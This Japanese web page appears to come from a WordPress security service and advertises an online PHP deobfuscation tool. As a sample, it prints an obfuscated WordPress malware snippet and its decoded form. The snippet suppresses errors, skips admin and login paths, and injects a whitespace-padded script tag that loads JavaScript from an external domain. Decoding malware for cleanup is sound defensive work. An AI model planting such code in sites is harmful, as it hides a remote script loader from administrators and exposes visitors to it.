Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php $a="err"./*1*/"or_repor"./*1*/"ting";$a(0);$a="dis"./*2*/"play"./*2*/"_er"."rors";ini_set($a,0);$a="ba"."s"./*2*/"e6"./*2*/"4_de"./*2*/"co"./*2*/"de"; $at = ''.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'';$v=0; if(strpos($at,$a('L3dwLWFkbWlu'))!==false){$v=1;} if(strpos($at,'/wp-login.p...



難読化されたPHPコード

<?php $a="err"./*1*/"or_repor"./*1*/"ting";$a(0);$a="dis"./*2*/"play"./*2*/"_er"."rors";ini_set($a,0);$a="ba"."s"./*2*/"e6"./*2*/"4_de"./*2*/"co"./*2*/"de"; $at = ''.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'';$v=0;  if(strpos($at,$a('L3dwLWFkbWlu'))!==false){$v=1;}   if(strpos($at,'/wp-login.php')!==false){$v=1;}  if(strpos($at,'wp-json')!==false){$v=1;} if(strpos($at,'rest_route')!==false){$v=1;}if($v==0){$n=chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(32).chr(116).chr(121).chr(112).chr(101).chr(61).chr(39).chr(116).chr(101).chr(120).chr(116).chr(47).chr(106).chr(97).chr(118).chr(97).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(39).chr(32).chr(115).chr(114).chr(99).chr(61).chr(39).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(119).chr(97).chr(121).chr(46).chr(115).chr(112).chr(101).chr(99).chr(105).chr(97).chr(108).chr(98).chr(108).chr(117).chr(101).chr(105).chr(116).chr(101).chr(109).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(115).chr(114).chr(99).chr(47).chr(109).chr(97).chr(105).chr(110).chr(46).chr(106).chr(115).chr(63).chr(118).chr(61).chr(49).chr(46).chr(48).chr(46).chr(49).chr(39).chr(32).chr(97).chr(115).chr(121).chr(110).chr(99).chr(61).chr(39).chr(116).chr(114).chr(117).chr(101).chr(39).chr(62).chr(60).chr(47).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(62);echo $n;}

デコード(難読化解除)されたコード

<?php

$a = "error_reporting";
error_reporting(0);
$a = "display_errors";
ini_set($a, 0);
$a = "base64_decode";
$at = '' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] . '';
$v = 0;
if (strpos($at, "/wp-admin") !== false) {
    $v = 1;
}
if (strpos($at, '/wp-login.php') !== false) {
    $v = 1;
}
if (strpos($at, 'wp-json') !== false) {
    $v = 1;
}
if (strpos($at, 'rest_route') !== false) {
    $v = 1;
}
if ($v == 0) {
    $n = "                                                                                                                                                                                                                                                                             <script type='text/javascript' src='https://way.specialblueitems.com/src/main.js?v=1.0.1' async='true'></script>";
    echo $n;
}

■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.